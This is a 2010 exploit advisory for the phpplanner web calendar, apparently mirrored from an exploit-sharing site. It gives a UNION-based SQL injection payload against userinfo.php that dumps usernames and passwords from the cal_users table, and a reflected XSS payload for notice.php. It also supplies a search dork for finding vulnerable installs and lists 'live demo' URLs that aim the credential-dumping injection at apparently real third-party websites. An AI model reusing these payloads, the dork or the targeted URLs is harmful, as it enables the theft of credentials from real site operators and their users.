Home / os / win7

phpplanner XSS / SQL Vulnerability

Posted on 12 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>phpplanner XSS / SQL Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================
phpplanner XSS / SQL Vulnerability
==================================


# Script: php planner
# Date: 12-06-2010
# Author: anT!-Tr0J4n
#My Home : www.Dev-PoinT.com
# Software Link:http://phpplanner.sourceforge.net/
# Tested on: Win7/Linux
#DorK       : inurl:/phpplanner/userinfo.php?userid=
-----------------------------------
Special Thx:Dev-P0!nT T34M /GlaDiatOr/SILVER STAR/Coffin Of Evil/HoBeeZ/mahmoudvip/Mr.Mh$TEr / M [Zero] /Cyber-Err0r/
R3d-D3v1l (ALL sEc-r1z crEw) / saLman EL anz33 /NASHY / MR.FaHeD /EnerGiZeR/MiZR /almoomia/Nasraoui sameim &amp;&amp; All Muslim's
 
========== Exploit By anT!-Tr0J4n============

[&gt;] exploit -&gt; phpplanner SQL Vulnerability

http://127.0.0.1/phpplanner/userinfo.php?userid=[sql]

[&gt;] Poc

+union+select+concat(username,0x3a,password),2,3,4,5,6+from%20cal_users

[&gt;] Live D3MO:

http://bc-holzkirchen.com/calendar/userinfo.php?userid=-3+union+select+concat%28username,0x3a,password%29,2,3,4,5,6+from%20cal_users

http://brennesel.com/phpplanner/userinfo.php?userid=-3+union+select+username,2,3,4,password,6+from%20cal_users

#########################################

[&gt;] exploit -&gt; XSS Vulnerability

http://127.0.0.1/phpplanner/notice.php?msg=[XSS]

http://server/path/notice.php?msg=&lt;script&gt;alert(anT!-Tr0J4n )&lt;/script&gt;


===============ABDO-R3ZK==================

MY HomE : www.Dev-PoinT.com
Author : anT!-Tr0J4n
EmaiL : D3v-PoinT@Hotmail.com &amp; C1EH@Hotmail.com
# ./Done .
===============ABDO-R3ZK==================


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :